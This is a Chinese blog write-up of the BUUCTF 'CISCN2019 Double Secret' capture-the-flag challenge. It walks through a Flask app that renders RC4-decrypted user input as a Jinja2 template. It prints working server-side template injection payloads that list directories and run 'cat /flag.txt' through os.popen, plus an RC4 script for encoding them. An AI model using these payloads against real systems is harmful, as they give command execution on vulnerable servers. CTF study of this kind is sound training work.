BUUCTF-WEB [CISCN2019 华东南赛区]Double Secret 1

最新推荐文章于 2024-05-17 00:00:22 发布
最新推荐文章于 2024-05-17 00:00:22 发布
阅读量744 收藏
点赞数 1
分类专栏: BUUCTF 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36410265/article/details/128944458
版权

考点

模板注入

RC4加密解密

前置知识

jinja2 模板注入payload

查看指定路径下所有文件

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{c.__init__.__globals__['__builtins__']['__import__']('os').listdir('/')}}{% endif %}{% endfor %}

读取文件

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat /flag.txt').read()")}}{% endif %}{% endfor %}

解题过程

分析

打开长这样

image-20211015101449870

扫了目录,扫出来robots.txt文件和secret

robots.txt的内容

image-20211015101631122

没有得到任何提示。

/sectet

image-20211015101758903

太菜了,好像也看不出什么,看了别的师傅wp,可以给secret提交一个secret参数。

当我提交/secret?secret=aaa会回显

image-20211015102128967

可能存在sql注入嫌疑,当我输入'的时候,回显了。

image-20211015102323093

有点奇怪,又看了wp一眼,这道题是模板注入。

当输入secret?secret=abc123的时候,会报错。

image-20211015102527981

可以得知网站是python的flask框架写的。

从报错中得到一部分源码

    if(secret==None):

        return 'Tell me your secret.I will encrypt it so others can\'t see'

    rc=rc4_Modified.RC4("HereIsTreasure")   #解密

    deS=rc.do_crypt(secret)

 

    a=render_template_string(safe(deS))

 

    if 'ciscn' in a.lower():

        return 'flag detected!'

    return a

到这我又看不懂了,菜鸡果然一步一个坑。得知这是一个RC4的解密功能,并给出了解密密钥HereIsTreasurea=render_template_string(safe(deS)),这一句,将解密后的明文渲染成字符串,回显出来。这里有一个safe函数,可能是用来过滤某些关键字对的,无从得知。

思路

已经知道这是模板注入,那么我们可以把模板注入的payload先进行RC4的加密,然后再传入,看看会有什么效果。

找到一个大师傅的脚本

import base64
from urllib import parse

def rc4_main(key = "init_key", message = "init_message"):#返回加密后得内容
    s_box = rc4_init_sbox(key)
    crypt = str(rc4_excrypt(message, s_box))
    return  crypt

def rc4_init_sbox(key):
    s_box = list(range(256)) 
    j = 0
    for i in range(256):
        j = (j + s_box[i] + ord(key[i % len(key)])) % 256
        s_box[i], s_box[j] = s_box[j], s_box[i]
    return s_box
def rc4_excrypt(plain, box):
    res = []
    i = j = 0
    for s in plain:
        i = (i + 1) % 256
        j = (j + box[i]) % 256
        box[i], box[j] = box[j], box[i]
        t = (box[i] + box[j]) % 256
        k = box[t]
        res.append(chr(ord(s) ^ k))
    cipher = "".join(res)
    return (str(base64.b64encode(cipher.encode('utf-8')), 'utf-8'))

key = "HereIsTreasure"  #此处为密文
message = input("请输入明文:\n")
enc_base64 = rc4_main( key , message )
enc_init = str(base64.b64decode(enc_base64),'utf-8')
enc_url = parse.quote(enc_init)
print("rc4加密后的url编码:"+enc_url)

查看根目录文件的payload

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{c.__init__.__globals__['__builtins__']['__import__']('os').listdir('/')}}{% endif %}{% endfor %}

加密得到

.J%19S%C2%A5%15Km%2B%C2%94%C3%96S%C2%85%C2%8F%C2%B8%C2%97%0B%C2%90X5%C2%A4A%C3%9FMD%C2%AE%07%C2%8BS%C3%9F7%C3%98%12%C3%85r%C3%A9%1B%C3%A4%2A%C3%A7w%C3%9B%C2%9E%C3%B1h%1D%C2%82%25%C3%AD%C3%B4%06%29%7F%C3%B0o%2C%C2%9E9%08%C3%87%C3%B7u.%C3%BB%C2%95%14%C2%BFv%05%19j%C2%AEL%C3%9A-%C3%A3t%C2%AC%7FX%2C8L%C2%81%C3%91H%C3%BF%C3%B6%C3%A3%C3%9A%C3%B5%C2%9A%C3%A5nw%C2%A7%C2%8E%C2%BC%C2%BE%C3%BBEy%C2%A9%C2%BBj%C2%83.%5B%18%C3%94%C2%89Y%08%1Aw%22%C3%A3%C3%97%C2%997v%C2%A07%0A%1B%C3%82_%C2%AFN%C2%BF%C2%A3%C2%B8%14%C3%81%C2%AAXy%C3%A5%C3%8D%3B%C2%BCS%0Anq%C2%9D%C2%80%C2%B5%C3%AF%C2%B0%C3%862%5E%22zI%C3%9C%09%C3%85%7BW%C3%A3%C2%99%14gk%C3%A4%C2%BBk%C2%BE%C3%83%C2%B1%0D%03%C3%99%18qu%C2%B4%C2%BCR%C2%81%C2%B1%C2%8E4%C2%A7%C3%A0%C3%8E

image-20211015103947907

回显了根目录下的文件夹,看到flag.txt

读取文件的payload

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat /flag.txt').read()")}}{% endif %}{% endfor %}

加密

.J%19S%C2%A5%15Km%2B%C2%94%C3%96S%C2%85%C2%8F%C2%B8%C2%97%0B%C2%90X5%C2%A4A%C3%9FMD%C2%AE%07%C2%8BS%C3%9F7%C3%98%12%C3%85r%C3%A9%1B%C3%A4%2A%C3%A7w%C3%9B%C2%9E%C3%B1h%1D%C2%82%25%C3%AD%C3%B4%06%29%7F%C3%B0o%2C%C2%9E9%08%C3%87%C3%B7u.%C3%BB%C2%95%14%C2%BFv%05%19j%C2%AEL%C3%9A-%C3%A3t%C2%AC%7FX%2C8L%C2%81%C3%91H%C3%BF%C3%B6%C3%A3%C3%9A%C3%B5%C2%9A%C2%A6%23%06%C2%A7%C2%B8%C2%BB%C2%B9%C3%A6ny%C3%98%C3%8Aj%C2%BB%25X%15%C3%97%C2%84F%24%1As%5E%C2%9B%C3%97%C2%A4%20j%C2%A5/%17%1C%C3%9Fs%C2%AF6%C3%85%C2%A5%C2%B1.%C3%A8%C2%A2Y%21%C2%A8%C3%A0%10%C2%8Aa%5D%5C%2B%C3%8E%C2%B0%C2%99%C3%A0%C2%BE%C2%87-%10x%20%5D%C3%9A%0B%C2%882P%C3%A3%C3%93%08n0%C3%AE%C3%BDb%C2%B1%C3%80%C3%B6%1F%5B%C2%88B%23%7E%C3%A6%C2%BC%5D%C2%81%C3%BF%C3%88d%C2%AE%C2%B8%C3%8E2%C2%92%20C%C2%B7%C2%B7%C2%95%C3%95Wj%C3%93%C2%B5%C3%AA_%C2%A1%2B%C2%87%C2%B5l%08%27%3F%C3%96

提交

image-20211015104124677

拿到了flag

总结

这道题知识盲区还挺多,做得起还是靠师傅们的wp,做这种题做完后给我一种感觉,就是觉得还是有很多不会的,但是如果都去深入了解一遍,很耽误做题时间,并且意义不大。

faaany
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Double ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
pwn赛题之Double ciscn 2019 第十二届全国大学生信息安全竞赛
华东理工大学网教电子商务1-期末复习题及参考答案.docx
12-15
华东理工大学网教电子商务1-期末复习题及参考答案.docx
SSTI---总结
wwwwyyyrre的博客
06-12 2226
1)过滤[]和.只过滤[]pop() 函数用于移除列表中的一个元素(默认最后一个元素),并且返回该元素的值。若.也被过滤,使用原生JinJa2函数|attr()将request.__class__改成request|attr("__class__")(2)过滤_利用request.args属性将其中的request.args改为request.values则利用post的方式进行传参(3)关键字过滤base64编码绕过__getattribute__使用实例访问属性时,调用该方法。
【BUUCTF】[CISCN2019 华东赛区]Double Secret
aoao331198的博客
04-22 1789
尝试/secret ?secret=1 输入长一点 发现出现了报错,这个页面是flask应用开启了debug模式后运行出错的表现,在较老版本的flask中可以直接在这个页面中打开python控制台运行代码,而在较新版本的flask中要打开python控制台需要输入一个pin码 仔细观察报错,不难发现一处引人注目,单独拎出来审计代码 if(secret==None): return 'Tell me your secret.I will encrypt it so others ca.
【CTF】buuctf web 详解(持续更新)
热门推荐
m0_52923241的博客
08-12 3万+
buuctf web[HCTF 2018]WarmUp[极客大挑战 2019]EasySQL[极客大挑战 2019]Havefun[强网杯 2019]随便注[ACTF2020 新生赛]Include[SUCTF 2019]EasySQL[极客大挑战 2019]Secret File[ACTF2020 新生赛]Exec[极客大挑战 2019]LoveSQL[GXYCTF2019]Ping Ping Ping[极客大挑战 2019]Knife[极客大挑战 2019]Http[RoarCTF 2019]Easy
[CISCN2019 华东赛区]Double Secret
怪味巧克力的博客
07-18 1400
0x01 进入页面如下 提示我们寻找secret,再加上题目的提示,猜测这里有secret页面,我们尝试访问,结果如下 根据它这个话的意思,是让我们传参,然后它会给你加密,我们试一下 发现输入的1变成了d,我们尝试增加输入参数的长度,然后就出现了下图的结果 报错了,直接源码泄露,然后我们看一下标记处 0x02 代码如下: File "/app/app.py", line 35, in secret if(secret==None): return 'Tell me you
[CISCN 2019华东]Double Secret
ph0ebus的博客
02-07 760
从一道赛题学习关于flask的模板注入和了解RC4加密
[CISCN2019 华东赛区]Double Secret flask模板 rc4加密
qq_62046696的博客
10-30 366
因为这是python中的flask模板界面,所以我们自然而然地可以想到用ssti模板注入。这里应该是进行了rc4的加密,解密密钥是HereIsTreasure。打开界面,这种要么让我们访问Secret页面,要么传参Secret。这里记得大小写的Secret都要尝试,然后让我们传参一个secret。以前碰到过这样进行输入源码,打算用脚本爆破,试一个比较大的值。需要一个rc4加密脚本,从网上搜一个。
2018-2019年华东师范大学825计算机学科基础考研真题
02-22
该资源为2018-2019年华东师范大学825计算机学科基础考研真题,资源高清无水印哦! 该资源为2018-2019年华东师范大学825计算机学科基础考研真题,资源高清无水印哦!
2013-2019年华东师范大学图情专硕考研复试真题
11-23
该资源为2013-2019年华东师范大学图情专硕考研复试真题,资源高清无水印哦! 该资源为2013-2019年华东师范大学图情专硕考研复试真题,资源高清无水印哦!
2011-2019年华东师范大学431金融综合考研真题及答案解析
11-17
该资源为2011-2019年华东师范大学431金融综合考研真题及答案解析,资源高清无水印哦! 该资源为2011-2019年华东师范大学431金融综合考研真题及答案解析,资源高清无水印哦!
BUUCTF:[CISCN2019 华东赛区]Double Secret
末初的CSDN博客
04-21 1319
BUUCTF:[CISCN2019 华东赛区]Double Secret 查看robots.txt 无可用信息 线索在目录:http://274c1aad-138b-4fe6-9815-8feeaf028127.node3.buuoj.cn/secret 尝试传参?secret= 发现当字符串长度超过4位的时候,出现报错 寻找关键代码 这里调用了rc4再通过render_templat...
[CISCN2019 华东赛区]Double Secret flask的debug
qq_54929891的博客
04-10 1219
打开靶机可以发现什么都没有,扫目录发现robots.txt,console(secret页面不知道为啥我开始没有扫出来) 进入console是一个交互平台,需要pin值,有点像python的debug(我开始还在这里看了很久的js文件) robots.txt我以为会给几个地址呢,结果告诉是一个安卓ctf,对于现在水平的我感觉没多大帮助 secret终于有用了,告诉我们给他一个secret值,它会加密让别人看不见,不知道是不是flag,试试吧,便用GET或者POST方法上传secret参数试
BUUCTF--[CISCN2019 华东赛区]Double Secret
qq_46263951的博客
07-18 747
首先进入页面后发现只有短短的一句话Welcome To Find Secret 看大佬们都是直接猜出来的/secret目录的,由于能力有限老老实实地用dirsearch扫出来了 进入目录后提示Tell me your secret.I will encrypt it so others can't see import base64 from urllib.parse import quote def rc4_main(key = "init_key", message = "init_mes.
CTF网络安全大赛简单web题目:eval
最新发布
Pythonit教程网
05-17 888
(错误控制运算符)等可能引发安全问题的函数。这个PHP脚本有几个关键部分,但首先,它是不安全的,因为使用了。红客网:blog.hongkewang.cn。只需要在web的url后面加上参数“题目来源于:bugku。一道简单web的题目。
python - 动物识别产生式系统实验 华东理工、
12-13
Python - 动物识别产生式系统实验是华东理工大学计算机科学与工程学院开展的一项实验项目。该项目旨在利用人工智能和机器学习技术,采用产生式系统对动物进行识别和分类。 在该实验中,学生们将利用Python编程语言...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值